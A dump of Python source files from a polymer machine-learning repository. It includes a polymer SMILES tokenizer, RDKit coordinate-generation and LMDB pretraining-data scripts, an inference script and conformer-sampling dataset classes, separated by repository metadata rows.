</Tip>
This tokenizer inherits from [`PreTrainedTokenizer`] which contains most of the main methods. Users should refer to
this superclass for more information regarding those methods.
Args:
vocab_file (`str`):
Path to the vocabulary file.
merges_file (`str`):
Path to the merges file.
errors (`str`, *optional*, defaults to `"replace"`):
Paradigm to follow when decoding bytes to UTF-8. See
[bytes.decode](https://docs.python.org/3/library/stdtypes.html#bytes.decode) for more information.
bos_token (`str`, *optional*, defaults to `"<s>"`):
The beginning of sequence token that was used during pretraining. Can be used a sequence classifier token.
<Tip>
When building a sequence using special tokens, this is not the token that is used for the beginning of
sequence. The token used is the `cls_token`.
</Tip>
eos_token (`str`, *optional*, defaults to `"</s>"`):
The end of sequence token.
<Tip>
When building a sequence using special tokens, this is not the token that is used for the end of sequence.
The token used is the `sep_token`.
</Tip>
sep_token (`str`, *optional*, defaults to `"</s>"`):
The separator token, which is used when building a sequence from multiple sequences, e.g. two sequences for
sequence classification or for a text and a question for question answering. It is also used as the last
token of a sequence built with special tokens.
cls_token (`str`, *optional*, defaults to `"<s>"`):
The classifier token which is used when doing sequence classification (classification of the whole sequence
instead of per-token classification). It is the first token of the sequence when built with special tokens.
unk_token (`str`, *optional*, defaults to `"<unk>"`):
The unknown token. A token that is not in the vocabulary cannot be converted to an ID and is set to be this
token instead.
pad_token (`str`, *optional*, defaults to `"<pad>"`):
The token used for padding, for example when batching sequences of different lengths.
mask_token (`str`, *optional*, defaults to `"<mask>"`):
The token used for masking values. This is the token used when training this model with masked language
modeling. This is the token which the model will try to predict.
add_prefix_space (`bool`, *optional*, defaults to `False`):
Whether or not to add an initial space to the input. This allows to treat the leading word just as any
other word. (RoBERTa tokenizer detect beginning of words by the preceding space).
"""
vocab_files_names = VOCAB_FILES_NAMES
pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
model_input_names = ["input_ids", "attention_mask"]
def __init__(
self,
vocab_file,
merges_file,
errors="replace",
bos_token="<s>",
eos_token="</s>",
sep_token="</s>",
cls_token="<s>",
unk_token="<unk>",
pad_token="<pad>",
mask_token="<mask>",
add_prefix_space=False,
**kwargs
):
bos_token = AddedToken(bos_token, lstrip=False, rstrip=False) if isinstance(bos_token, str) else bos_token
eos_token = AddedToken(eos_token, lstrip=False, rstrip=False) if isinstance(eos_token, str) else eos_token
sep_token = AddedToken(sep_token, lstrip=False, rstrip=False) if isinstance(sep_token, str) else sep_token
cls_token = AddedToken(cls_token, lstrip=False, rstrip=False) if isinstance(cls_token, str) else cls_token
unk_token = AddedToken(unk_token, lstrip=False, rstrip=False) if isinstance(unk_token, str) else unk_token
pad_token = AddedToken(pad_token, lstrip=False, rstrip=False) if isinstance(pad_token, str) else pad_token
# Mask token behave like a normal word, i.e. include the space before it
mask_token = AddedToken(mask_token, lstrip=True, rstrip=False) if isinstance(mask_token, str) else mask_token
super().__init__(
errors=errors,
bos_token=bos_token,
eos_token=eos_token,
unk_token=unk_token,
sep_token=sep_token,
cls_token=cls_token,
pad_token=pad_token,
mask_token=mask_token,
add_prefix_space=add_prefix_space,
**kwargs,
)
with open(vocab_file, encoding="utf-8") as vocab_handle:
self.encoder = json.load(vocab_handle)
self.decoder = {v: k for k, v in self.encoder.items()}
self.errors = errors # how to handle errors in decoding
self.byte_encoder = bytes_to_unicode()
self.byte_decoder = {v: k for k, v in self.byte_encoder.items()}
with open(merges_file, encoding="utf-8") as merges_handle:
bpe_merges = merges_handle.read().split("\n")[1:-1]
bpe_merges = [tuple(merge.split()) for merge in bpe_merges]
self.bpe_ranks = dict(zip(bpe_merges, range(len(bpe_merges))))
self.cache = {}
self.add_prefix_space = add_prefix_space
# Should have added re.IGNORECASE so BPE merges can happen for capitalized versions of contractions
"""Regex for SMILES"""
smi_regex_pattern = r"(\-?[0-9]+\.?[0-9]*|\[|\]|SELF|Li|Be|Na|Mg|Al|K|Ca|Co|Zn|Ga|Ge|As|Se|Sn|Te|N|O|P|H|I|b|c|n|o|s|p|Br?|Cl?|Fe?|Ni?|Si?|\||\(|\)|\^|=|#|-|\+|\\|\/|@|\*|\.|\%|\$)"
self.pat = re.compile(smi_regex_pattern)
@property
def vocab_size(self):
return len(self.encoder)
def get_vocab(self):
return dict(self.encoder, **self.added_tokens_encoder)
def bpe(self, token):
if token in self.cache:
return self.cache[token]
word = tuple(token)
pairs = get_pairs(word)
if not pairs:
return token
while True:
bigram = min(pairs, key=lambda pair: self.bpe_ranks.get(pair, float("inf")))
if bigram not in self.bpe_ranks:
break
first, second = bigram
new_word = []
i = 0
while i < len(word):
try:
j = word.index(first, i)
except ValueError:
new_word.extend(word[i:])
break
else:
new_word.extend(word[i:j])
i = j
if word[i] == first and i < len(word) - 1 and word[i + 1] == second:
new_word.append(first + second)
i += 2
else:
new_word.append(word[i])
i += 1
new_word = tuple(new_word)
word = new_word
if len(word) == 1:
break
else:
pairs = get_pairs(word)
word = " ".join(word)
self.cache[token] = word
return word
def _tokenize(self, text):
"""Tokenize a string."""
bpe_tokens = []
for token in re.findall(self.pat, text):
token = "".join(
self.byte_encoder[b] for b in token.encode("utf-8")
) # Maps all our bytes to unicode strings, avoiding control tokens of the BPE (spaces in our case)
bpe_tokens.extend(bpe_token for bpe_token in self.bpe(token).split(" "))
return bpe_tokens
def _convert_token_to_id(self, token):
"""Converts a token (str) in an id using the vocab."""
return self.encoder.get(token, self.encoder.get(self.unk_token))
def _convert_id_to_token(self, index):
"""Converts an index (integer) in a token (str) using the vocab."""
return self.decoder.get(index)
def convert_tokens_to_string(self, tokens):
"""Converts a sequence of tokens (string) in a single string."""
text = "".join(tokens)
text = bytearray([self.byte_decoder[c] for c in text]).decode("utf-8", errors=self.errors)
return text
def save_vocabulary(self, save_directory: str, filename_prefix: Optional[str] = None) -> Tuple[str]:
if not os.path.isdir(save_directory):
logger.error(f"Vocabulary path ({save_directory}) should be a directory")
return
vocab_file = os.path.join(
save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["vocab_file"]
)
merge_file = os.path.join(
save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["merges_file"]
)
with open(vocab_file, "w", encoding="utf-8") as f:
f.write(json.dumps(self.encoder, ensure_ascii=False))
index = 0
with open(merge_file, "w", encoding="utf-8") as writer:
writer.write("#version: 0.2\n")
for bpe_tokens, token_index in sorted(self.bpe_ranks.items(), key=lambda kv: kv[1]):
if index != token_index:
logger.warning(
f"Saving vocabulary to {merge_file}: BPE merge indices are not consecutive."
" Please check that the tokenizer is not corrupted!"
)
index = token_index
writer.write(" ".join(bpe_tokens) + "\n")
index += 1
return vocab_file, merge_file
def build_inputs_with_special_tokens(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
"""
Build model inputs from a sequence or a pair of sequence for sequence classification tasks by concatenating and
adding special tokens. A RoBERTa sequence has the following format:
- single sequence: `<s> X </s>`
- pair of sequences: `<s> A </s></s> B </s>`
Args:
token_ids_0 (`List[int]`):
List of IDs to which the special tokens will be added.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
Returns:
`List[int]`: List of [input IDs](../glossary#input-ids) with the appropriate special tokens.
"""
if token_ids_1 is None:
return [self.cls_token_id] + token_ids_0 + [self.sep_token_id]
cls = [self.cls_token_id]
sep = [self.sep_token_id]
return cls + token_ids_0 + sep + sep + token_ids_1 + sep
def get_special_tokens_mask(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None, already_has_special_tokens: bool = False
) -> List[int]:
"""
Retrieve sequence ids from a token list that has no special tokens added. This method is called when adding
special tokens using the tokenizer `prepare_for_model` method.
Args:
token_ids_0 (`List[int]`):
List of IDs.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
already_has_special_tokens (`bool`, *optional*, defaults to `False`):
Whether or not the token list is already formatted with special tokens for the model.
Returns:
`List[int]`: A list of integers in the range [0, 1]: 1 for a special token, 0 for a sequence token.
"""
if already_has_special_tokens:
return super().get_special_tokens_mask(
token_ids_0=token_ids_0, token_ids_1=token_ids_1, already_has_special_tokens=True
)
if token_ids_1 is None:
return [1] + ([0] * len(token_ids_0)) + [1]
return [1] + ([0] * len(token_ids_0)) + [1, 1] + ([0] * len(token_ids_1)) + [1]
def create_token_type_ids_from_sequences(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
"""
Create a mask from the two sequences passed to be used in a sequence-pair classification task. RoBERTa does not
make use of token type ids, therefore a list of zeros is returned.
Args:
token_ids_0 (`List[int]`):
List of IDs.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
Returns:
`List[int]`: List of zeros.
"""
sep = [self.sep_token_id]
cls = [self.cls_token_id]
if token_ids_1 is None:
return len(cls + token_ids_0 + sep) * [0]
return len(cls + token_ids_0 + sep + sep + token_ids_1 + sep) * [0]
def prepare_for_tokenization(self, text, is_split_into_words=False, **kwargs):
add_prefix_space = kwargs.pop("add_prefix_space", self.add_prefix_space)
if (is_split_into_words or add_prefix_space) and (len(text) > 0 and not text[0].isspace()):
text = " " + text
return (text, kwargs)
def smi2scaffold(smi):
try:
return MurckoScaffold.MurckoScaffoldSmiles(
smiles=smi, includeChirality=True)
except:
print("failed to generate scaffold with smiles: {}".format(smi))
return smi
def smi2_2Dcoords(smi):
mol = Chem.MolFromSmiles(smi)
mol = AllChem.AddHs(mol)
AllChem.Compute2DCoords(mol)
coordinates = mol.GetConformer().GetPositions().astype(np.float32)
len(mol.GetAtoms()) == len(coordinates), "2D coordinates shape is not align with {}".format(smi)
return coordinates
def smi2_3Dcoords(smi,cnt):
mol = Chem.MolFromSmiles(smi)
mol = AllChem.AddHs(mol)
coordinate_list=[]
for seed in range(cnt):
try:
res = AllChem.EmbedMolecule(mol, randomSeed=seed) # will random generate conformer with seed equal to -1. else fixed random seed.
if res == 0:
try:
AllChem.MMFFOptimizeMolecule(mol) # some conformer can not use MMFF optimize
coordinates = mol.GetConformer().GetPositions()
except:
print("Failed to generate 3D, replace with 2D")
coordinates = smi2_2Dcoords(smi)
elif res == -1:
mol_tmp = Chem.MolFromSmiles(smi)
AllChem.EmbedMolecule(mol_tmp, maxAttempts=5000, randomSeed=seed)
mol_tmp = AllChem.AddHs(mol_tmp, addCoords=True)
try:
AllChem.MMFFOptimizeMolecule(mol_tmp) # some conformer can not use MMFF optimize
coordinates = mol_tmp.GetConformer().GetPositions()
except:
print("Failed to generate 3D, replace with 2D")
coordinates = smi2_2Dcoords(smi)
except:
print("Failed to generate 3D, replace with 2D")
coordinates = smi2_2Dcoords(smi)
assert len(mol.GetAtoms()) == len(coordinates), "3D coordinates shape is not align with {}".format(smi)
coordinate_list.append(coordinates.astype(np.float32))
return coordinate_list
def inner_smi2coords(content):
smi = content[0]
mol = Chem.MolFromSmiles(smi)
atoms = [atom.GetSymbol() for atom in mol.GetAtoms()]
assert 'H' not in atoms
star_atoms_id = []
for idx, atom_symbol in enumerate(atoms):
if atom_symbol == '*':
star_atoms_id.append(idx)
assert len(star_atoms_id) == 2, "Error star num"
star_pair_list = []
for star_id in star_atoms_id:
star_pair_list.append(star_id)
star_atom = mol.GetAtomWithIdx(star_id)
neighbors = star_atom.GetNeighbors()
assert len(neighbors) == 1, "Error star neighbors num"
for neighbor in neighbors:
star_pair_list.append(neighbor.GetIdx())
pair_1_star = star_pair_list[0]
pair_1 = star_pair_list[3]
atom = mol.GetAtomWithIdx(pair_1_star)
atom.SetAtomicNum(mol.GetAtomWithIdx(pair_1).GetAtomicNum())
pair_2_star = star_pair_list[2]
pair_2 = star_pair_list[1]
atom = mol.GetAtomWithIdx(pair_2_star)
atom.SetAtomicNum(mol.GetAtomWithIdx(pair_2).GetAtomicNum())
smi = Chem.MolToSmiles(mol)
cnt = 10
scaffold = smi2scaffold(smi)
if len(mol.GetAtoms()) > 400:
coordinate_list = [smi2_2Dcoords(smi)] * (cnt+1)
print("atom num > 400, use 2D coords",smi)
else:
coordinate_list = smi2_3Dcoords(smi, cnt)
coordinate_list.append(smi2_2Dcoords(smi).astype(np.float32))
mol = Chem.MolFromSmiles(smi)
mol = AllChem.AddHs(mol)
atoms = [atom.GetSymbol() for atom in mol.GetAtoms()]
origin_smi = content[0]
origin_mol = Chem.MolFromSmiles(origin_smi)
origin_atoms = [atom.GetSymbol() for atom in origin_mol.GetAtoms()]
assert origin_atoms[pair_1_star] == '*'
assert origin_atoms[pair_2_star] == '*'
atoms[pair_1_star] = '*'
atoms[pair_2_star] = '*'
return {'atoms': atoms,
'coordinates': coordinate_list,
'mol':mol, 'smi': smi, 'origin_smi': content[0], 'star_pair': star_pair_list, 'scaffold': scaffold}
def smi2coords(content):
try:
return inner_smi2coords(content)
except:
print("failed psmiles: {}".format(content[0]))
return None
if __name__ == "__main__":
tokenizer = PolymerSmilesTokenizer.from_pretrained("../MMPolymer/models/roberta-base", max_len=411)
save_path = f'./pretrain_data/'
os.makedirs(save_path, exist_ok=True)
content_list = []
with open(f'./data/PI1M.csv', newline='', encoding='utf-8') as csvfile:
csvreader = csv.reader(csvfile)
headers = next(csvreader)
for row in csvreader:
if "*" not in row[0]:
continue
content_list.append(row)
env = lmdb.open(
os.path.join(save_path, 'PI1M.lmdb'),
subdir=False,
readonly=False,
lock=False,
readahead=False,
meminit=False,
max_readers=1,
map_size=int(100e9),
)
txn = env.begin(write=True)
# pretrain_data_process
index = 0
for content in tqdm(content_list):
data_info = smi2coords(content)
if data_info == None:
continue
encoding = tokenizer(
str(data_info['origin_smi']),
add_special_tokens=True,
max_length=411,
return_token_type_ids=False,
padding="max_length",
truncation=True,
return_attention_mask=True,
return_tensors='pt',
)
data_info["input_ids"] = encoding["input_ids"].flatten()
data_info["attention_mask"] = encoding["attention_mask"].flatten()
assert data_info["input_ids"].shape[0] == 411
assert data_info["attention_mask"].shape[0] == 411
txn.put(f'{index}'.encode("ascii"), pickle.dumps(data_info, protocol=-1))
index += 1
txn.commit()
env.close()
print(f'pretrain_data, total_num:{index}')
| 24,264 | Python | .py | 511 | 37.857143 | 189 | 0.618739 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,130 | infer.py | FanmengWang_MMPolymer/MMPolymer/infer.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import logging
import os
import sys
import pickle
import torch
from unicore import checkpoint_utils, distributed_utils, options, utils
from unicore.logging import progress_bar
from unicore import tasks
logging.basicConfig(
format="%(asctime)s | %(levelname)s | %(name)s | %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
level=os.environ.get("LOGLEVEL", "INFO").upper(),
stream=sys.stdout,
)
logger = logging.getLogger("MMPolymer.inference")
def main(args):
assert (
args.batch_size is not None
), "Must specify batch size either with --batch-size"
use_fp16 = args.fp16
use_cuda = torch.cuda.is_available() and not args.cpu
if use_cuda:
torch.cuda.set_device(args.device_id)
if args.distributed_world_size > 1:
data_parallel_world_size = distributed_utils.get_data_parallel_world_size()
data_parallel_rank = distributed_utils.get_data_parallel_rank()
else:
data_parallel_world_size = 1
data_parallel_rank = 0
# Load model
logger.info("loading model(s) from {}".format(args.path))
state = checkpoint_utils.load_checkpoint_to_cpu(args.path)
task = tasks.setup_task(args)
model = task.build_model(args)
model.load_state_dict(state["model"], strict=False)
# Move models to GPU
if use_fp16:
model.half()
if use_cuda:
model.cuda()
# Print args
logger.info(args)
# Build loss
loss = task.build_loss(args)
loss.eval()
for subset in args.valid_subset.split(","):
try:
task.load_dataset(subset, combine=False, epoch=1)
dataset = task.dataset(subset)
except KeyError:
raise Exception("Cannot find dataset: " + subset)
if not os.path.exists(args.results_path):
os.makedirs(args.results_path)
fname = (args.path).split("/")[-2]
save_path = os.path.join(args.results_path, fname + "_" + subset + ".out.pkl")
save_cpu_path = os.path.join(args.results_path, fname + "_" + subset + "_cpu" +".out.pkl")
# Initialize data iterator
itr = task.get_batch_iterator(
dataset=dataset,
batch_size=args.batch_size,
ignore_invalid_inputs=True,
required_batch_size_multiple=args.required_batch_size_multiple,
seed=args.seed,
num_shards=data_parallel_world_size,
shard_id=data_parallel_rank,
num_workers=args.num_workers,
data_buffer_size=args.data_buffer_size,
).next_epoch_itr(shuffle=False)
progress = progress_bar.progress_bar(
itr,
log_format=args.log_format,
log_interval=args.log_interval,
prefix=f"valid on '{subset}' subset",
default_log_format=("tqdm" if not args.no_progress_bar else "simple"),
)
log_outputs = []
for i, sample in enumerate(progress):
sample = utils.move_to_cuda(sample) if use_cuda else sample
if len(sample) == 0:
continue
_, _, log_output = task.valid_step(sample, model, loss, test=True)
progress.log({}, step=i)
log_outputs.append(log_output)
print(len(log_outputs))
# 将cuda上的数据转移到cpu 方便后续进行并行计算
log_outputs_cpu = log_outputs
for i in range(len(log_outputs_cpu)):
for key in log_outputs_cpu[i]:
try:
log_outputs_cpu[i][key] = log_outputs_cpu[i][key].cpu()
except:
pass
pickle.dump(log_outputs_cpu, open(save_cpu_path, "wb"))
pickle.dump(log_outputs, open(save_path, "wb"))
logger.info("Done inference! ")
return None
def cli_main():
parser = options.get_validation_parser()
options.add_model_args(parser)
args = options.parse_args_and_arch(parser)
distributed_utils.call_main(args, main)
if __name__ == "__main__":
cli_main()
| 4,182 | Python | .py | 105 | 30.914286 | 98 | 0.623301 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,131 | __init__.py | FanmengWang_MMPolymer/MMPolymer/__init__.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import importlib
import MMPolymer.tasks
import MMPolymer.data
import MMPolymer.models
import MMPolymer.losses
| 240 | Python | .py | 7 | 33 | 69 | 0.844156 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,132 | data_utils.py | FanmengWang_MMPolymer/MMPolymer/data/data_utils.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import numpy as np
import contextlib
@contextlib.contextmanager
def numpy_seed(seed, *addl_seeds):
"""Context manager which seeds the NumPy PRNG with the specified seed and
restores the state afterward"""
if seed is None:
yield
return
if len(addl_seeds) > 0:
seed = int(hash((seed, *addl_seeds)) % 1e6)
state = np.random.get_state()
np.random.seed(seed)
try:
yield
finally:
np.random.set_state(state)
| 604 | Python | .py | 19 | 26.842105 | 77 | 0.689003 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,133 | prepend_and_append_2d_dataset.py | FanmengWang_MMPolymer/MMPolymer/data/prepend_and_append_2d_dataset.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import torch
from functools import lru_cache
from unicore.data import BaseWrapperDataset
class PrependAndAppend2DDataset(BaseWrapperDataset):
def __init__(self, dataset, token=None):
super().__init__(dataset)
self.token = token
@lru_cache(maxsize=16)
def __getitem__(self, idx):
item = self.dataset[idx]
if self.token is not None:
h, w = item.size(-2), item.size(-1)
new_item = torch.full((h + 2, w + 2), self.token).type_as(item)
new_item[1:-1, 1:-1] = item
return new_item
return item
| 719 | Python | .py | 18 | 33.166667 | 75 | 0.645624 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,134 | conformer_sample_dataset.py | FanmengWang_MMPolymer/MMPolymer/data/conformer_sample_dataset.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import numpy as np
from functools import lru_cache
from unicore.data import BaseWrapperDataset
from . import data_utils
class ConformerSampleDataset(BaseWrapperDataset):
def __init__(self, dataset, seed, atoms, coordinates):
self.dataset = dataset
self.seed = seed
self.atoms = atoms
self.coordinates = coordinates
self.set_epoch(None)
def set_epoch(self, epoch, **unused):
super().set_epoch(epoch)
self.epoch = epoch
@lru_cache(maxsize=16)
def __cached_item__(self, index: int, epoch: int):
atoms = np.array(self.dataset[index][self.atoms])
assert len(atoms) > 0
size = len(self.dataset[index][self.coordinates])
with data_utils.numpy_seed(self.seed, epoch, index):
sample_idx = np.random.randint(size)
coordinates = self.dataset[index][self.coordinates][sample_idx]
input_ids = self.dataset[index]["input_ids"]
attention_mask = self.dataset[index]["attention_mask"]
return {"atoms": atoms, "coordinates": coordinates.astype(np.float32), "input_ids": input_ids, "attention_mask": attention_mask}
def __getitem__(self, index: int):
return self.__cached_item__(index, self.epoch)
class ConformerSamplePocketDataset(BaseWrapperDataset):
def __init__(self, dataset, seed, atoms, coordinates, dict_name):
self.dataset = dataset
self.seed = seed
self.atoms = atoms
self.dict_name = dict_name
self.coordinates = coordinates
self.set_epoch(None)
def set_epoch(self, epoch, **unused):
super().set_epoch(epoch)
self.epoch = epoch
@lru_cache(maxsize=16)
def __cached_item__(self, index: int, epoch: int):
if self.dict_name == "dict_coarse.txt":
atoms = np.array([a[0] for a in self.dataset[index][self.atoms]])
elif self.dict_name == "dict_fine.txt":
atoms = np.array(
[
a[0] if len(a) == 1 or a[0] == "H" else a[:2]
for a in self.dataset[index][self.atoms]
]
)
assert len(atoms) > 0
size = len(self.dataset[index][self.coordinates])
with data_utils.numpy_seed(self.seed, epoch, index):
sample_idx = np.random.randint(size)
coordinates = self.dataset[index][self.coordinates][sample_idx]
residue = np.array(self.dataset[index]["residue"])
score = np.float(self.dataset[index]["meta_info"]["fpocket"]["Score"])
return {
"atoms": atoms,
"coordinates": coordinates.astype(np.float32),
"residue": residue,
"score": score,
}
def __getitem__(self, index: int):
return self.__cached_item__(index, self.epoch)
class ConformerSamplePocketFinetuneDataset(BaseWrapperDataset):
def __init__(self, dataset, seed, atoms, residues, coordinates):
self.dataset = dataset
self.seed = seed
self.atoms = atoms
self.residues = residues
self.coordinates = coordinates
self.set_epoch(None)
def set_epoch(self, epoch, **unused):
super().set_epoch(epoch)
self.epoch = epoch
@lru_cache(maxsize=16)
def __cached_item__(self, index: int, epoch: int):
atoms = np.array(
[a[0] for a in self.dataset[index][self.atoms]]
) # only 'C H O N S'
assert len(atoms) > 0
# This judgment is reserved for possible future expansion.
# The number of pocket conformations is 1, and the 'sample' does not work.
if isinstance(self.dataset[index][self.coordinates], list):
size = len(self.dataset[index][self.coordinates])
with data_utils.numpy_seed(self.seed, epoch, index):
sample_idx = np.random.randint(size)
coordinates = self.dataset[index][self.coordinates][sample_idx]
else:
coordinates = self.dataset[index][self.coordinates]
if self.residues in self.dataset[index]:
residues = np.array(self.dataset[index][self.residues])
else:
residues = None
assert len(atoms) == len(coordinates)
return {
self.atoms: atoms,
self.coordinates: coordinates.astype(np.float32),
self.residues: residues,
}
def __getitem__(self, index: int):
return self.__cached_item__(index, self.epoch)
class ConformerSampleConfGDataset(BaseWrapperDataset):
def __init__(self, dataset, seed, atoms, coordinates, tgt_coordinates):
self.dataset = dataset
self.seed = seed
self.atoms = atoms
self.coordinates = coordinates
self.tgt_coordinates = tgt_coordinates
self.set_epoch(None)
def set_epoch(self, epoch, **unused):
super().set_epoch(epoch)
self.epoch = epoch
@lru_cache(maxsize=16)
def __cached_item__(self, index: int, epoch: int):
atoms = np.array(self.dataset[index][self.atoms])
assert len(atoms) > 0
size = len(self.dataset[index][self.coordinates])
with data_utils.numpy_seed(self.seed, epoch, index):
sample_idx = np.random.randint(size)
coordinates = self.dataset[index][self.coordinates][sample_idx]
tgt_coordinates = self.dataset[index][self.tgt_coordinates]
return {
self.atoms: atoms,
self.coordinates: coordinates.astype(np.float32),
self.tgt_coordinates: tgt_coordinates.astype(np.float32),
}
def __getitem__(self, index: int):
return self.__cached_item__(index, self.epoch)
class ConformerSampleConfGV2Dataset(BaseWrapperDataset):
def __init__(
self,
dataset,
seed,
atoms,
coordinates,
tgt_coordinates,
beta=1.0,
smooth=0.1,
topN=10,
):
self.dataset = dataset
self.seed = seed
self.atoms = atoms
self.coordinates = coordinates
self.tgt_coordinates = tgt_coordinates
self.beta = beta
self.smooth = smooth
self.topN = topN
self.set_epoch(None)
def set_epoch(self, epoch, **unused):
super().set_epoch(epoch)
self.epoch = epoch
@lru_cache(maxsize=16)
def __cached_item__(self, index: int, epoch: int):
atoms = np.array(self.dataset[index][self.atoms])
assert len(atoms) > 0
meta_df = self.dataset[index]["meta"]
tgt_conf_ids = meta_df["gid"].unique()
# randomly choose one conf
with data_utils.numpy_seed(self.seed, epoch, index):
conf_id = np.random.choice(tgt_conf_ids)
conf_df = meta_df[meta_df["gid"] == conf_id]
conf_df = conf_df.sort_values("score").reset_index(drop=False)[
: self.topN
] # only use top 5 confs for sampling...
# importance sampling with rmsd inverse score
def normalize(x, beta=1.0, smooth=0.1):
x = 1.0 / (x**beta + smooth)
return x / x.sum()
rmsd_score = conf_df["score"].values
weight = normalize(
rmsd_score, beta=self.beta, smooth=self.smooth
) # for smoothing purpose
with data_utils.numpy_seed(self.seed, epoch, index):
idx = np.random.choice(len(conf_df), 1, replace=False, p=weight)
# idx = [np.argmax(weight)]
coordinates = conf_df.iloc[idx]["rdkit_coords"].values[0]
tgt_coordinates = conf_df.iloc[idx]["tgt_coords"].values[0]
return {
self.atoms: atoms,
self.coordinates: coordinates.astype(np.float32),
self.tgt_coordinates: tgt_coordinates.astype(np.float32),
}
def __getitem__(self, index: int):
return self.__cached_item__(index, self.epoch)
class ConformerSampleDockingPoseDataset(BaseWrapperDataset):
def __init__(
self,
dataset,
seed,
atoms,
coordinates,
pocket_atoms,
pocket_coordinates,
holo_coordinates,
holo_pocket_coordinates,
is_train=True,
):
self.dataset = dataset
self.seed = seed
self.atoms = atoms
self.coordinates = coordinates
self.pocket_atoms = pocket_atoms
self.pocket_coordinates = pocket_coordinates
self.holo_coordinates = holo_coordinates
self.holo_pocket_coordinates = holo_pocket_coordinates
self.is_train = is_train
self.set_epoch(None)
def set_epoch(self, epoch, **unused):
super().set_epoch(epoch)
self.epoch = epoch
@lru_cache(maxsize=16)
def __cached_item__(self, index: int, epoch: int):
atoms = np.array(self.dataset[index][self.atoms])
size = len(self.dataset[index][self.coordinates])
with data_utils.numpy_seed(self.seed, epoch, index):
sample_idx = np.random.randint(size)
coordinates = self.dataset[index][self.coordinates][sample_idx]
pocket_atoms = np.array(
[item[0] for item in self.dataset[index][self.pocket_atoms]]
)
pocket_coordinates = self.dataset[index][self.pocket_coordinates][0]
if self.is_train:
holo_coordinates = self.dataset[index][self.holo_coordinates][0]
holo_pocket_coordinates = self.dataset[index][self.holo_pocket_coordinates][
0
]
else:
holo_coordinates = coordinates
holo_pocket_coordinates = pocket_coordinates
smi = self.dataset[index]["smi"]
pocket = self.dataset[index]["pocket"]
return {
"atoms": atoms,
"coordinates": coordinates.astype(np.float32),
"pocket_atoms": pocket_atoms,
"pocket_coordinates": pocket_coordinates.astype(np.float32),
"holo_coordinates": holo_coordinates.astype(np.float32),
"holo_pocket_coordinates": holo_pocket_coordinates.astype(np.float32),
"smi": smi,
"pocket": pocket,
}
def __getitem__(self, index: int):
return self.__cached_item__(index, self.epoch)
| 10,289 | Python | .py | 247 | 32.42915 | 136 | 0.612932 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,135 | from_str_dataset.py | FanmengWang_MMPolymer/MMPolymer/data/from_str_dataset.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import torch
from functools import lru_cache
from unicore.data import UnicoreDataset
class FromStrLabelDataset(UnicoreDataset):
def __init__(self, labels):
super().__init__()
self.labels = labels
@lru_cache(maxsize=16)
def __getitem__(self, index):
return self.labels[index]
def __len__(self):
return len(self.labels)
def collater(self, samples):
return torch.tensor(list(map(float, samples)))
| 588 | Python | .py | 16 | 31.625 | 69 | 0.699647 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,136 | add_2d_conformer_dataset.py | FanmengWang_MMPolymer/MMPolymer/data/add_2d_conformer_dataset.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import numpy as np
from functools import lru_cache
from unicore.data import BaseWrapperDataset
from rdkit import Chem
from rdkit.Chem import AllChem
class Add2DConformerDataset(BaseWrapperDataset):
def __init__(self, dataset, smi, atoms, coordinates):
self.dataset = dataset
self.smi = smi
self.atoms = atoms
self.coordinates = coordinates
self.set_epoch(None)
def set_epoch(self, epoch, **unused):
super().set_epoch(epoch)
self.epoch = epoch
@lru_cache(maxsize=16)
def __cached_item__(self, index: int, epoch: int):
atoms = np.array(self.dataset[index][self.atoms])
assert len(atoms) > 0
smi = self.dataset[index][self.smi]
coordinates_2d = smi2_2Dcoords(smi)
coordinates = self.dataset[index][self.coordinates]
coordinates.append(coordinates_2d)
input_ids = self.dataset[index]["input_ids"]
attention_mask = self.dataset[index]["attention_mask"]
return {"smi": smi, "atoms": atoms, "coordinates": coordinates, "input_ids": input_ids, "attention_mask": attention_mask}
def __getitem__(self, index: int):
return self.__cached_item__(index, self.epoch)
def smi2_2Dcoords(smi):
mol = Chem.MolFromSmiles(smi)
mol = AllChem.AddHs(mol)
AllChem.Compute2DCoords(mol)
coordinates = mol.GetConformer().GetPositions().astype(np.float32)
len(mol.GetAtoms()) == len(
coordinates
), "2D coordinates shape is not align with {}".format(smi)
return coordinates
